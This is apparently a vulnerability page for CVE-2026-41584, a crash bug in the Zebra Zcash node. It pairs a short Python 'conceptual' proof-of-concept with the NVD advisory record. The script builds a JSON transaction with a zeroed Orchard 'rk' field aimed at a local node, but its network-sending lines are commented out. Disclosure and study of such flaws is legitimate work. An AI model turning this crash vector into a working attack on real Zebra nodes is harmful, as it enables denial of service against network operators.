CVE-2026-41584

import socket import json # Conceptual PoC for CVE-2026-41584 # This script simulates sending a crafted transaction to a ZEBRA node. # The key vulnerability is the 'rk' field in Orchard transactions being set to the identity (zero). def send_malicious_transaction(target_ip, target_port): # Construct a malicious transaction payload # Note: Real Zcash transaction construction is complex; this is a conceptual representation. # The critical part is setting the Orchard 'rk' field to all zeros (identity). malicious_tx = { "version": 4, "orchard": { "actions": [], "rk": "00" * 32 # Setting rk to identity (zero) value triggers the panic } } payload = json.dumps(malicious_tx).encode('utf-8') try: print(f"[*] Sending crafted transaction to {target_ip}:{target_port}...") # In a real scenario, this would use the Zcash P2P protocol (ZMQ or TCP) # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((target_ip, target_port)) # sock.sendall(payload) # sock.close() print("[+] Payload sent. If the node is vulnerable, it should crash.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "127.0.0.1" port = 8233 send_malicious_transaction(target, port)

{"cve": {"id": "CVE-2026-41584", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:41.240", "lastModified": "2026-05-08T18:21:13.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-chain version 6.0.2, Orchard transactions contain a rk field which is a randomized validating key and also an elliptic curve point. The Zcash specification allows the field to be the identity (a \"zero\" value), however, the orchard crate which is used to verify Orchard proofs would panic when fed a rk with the identity value. Thus an attacker could send a crafted transaction that would make a Zebra node crash. This issue has been patched in zebrad version 4.3.1 and zebra-chain version 6.0.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zfnd:zebra-chain:*:*:*:*:*:rust:*:*", "versionEndExcluding": "6.0.2", "matchCriteriaId": "6D27B49B-A5E1-4A40-BCB2-453AC6BF0150"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zfnd:zebrad:*:*:*:*:*:rust:*:*", "versionEndExcluding": "4.3.1", "matchCriteriaId": "0D5F3C05-ECFC-43B1-9168-8E114125F6B7"}]}]}], "references": [{"url": "https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-452v-w3gx-72wg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}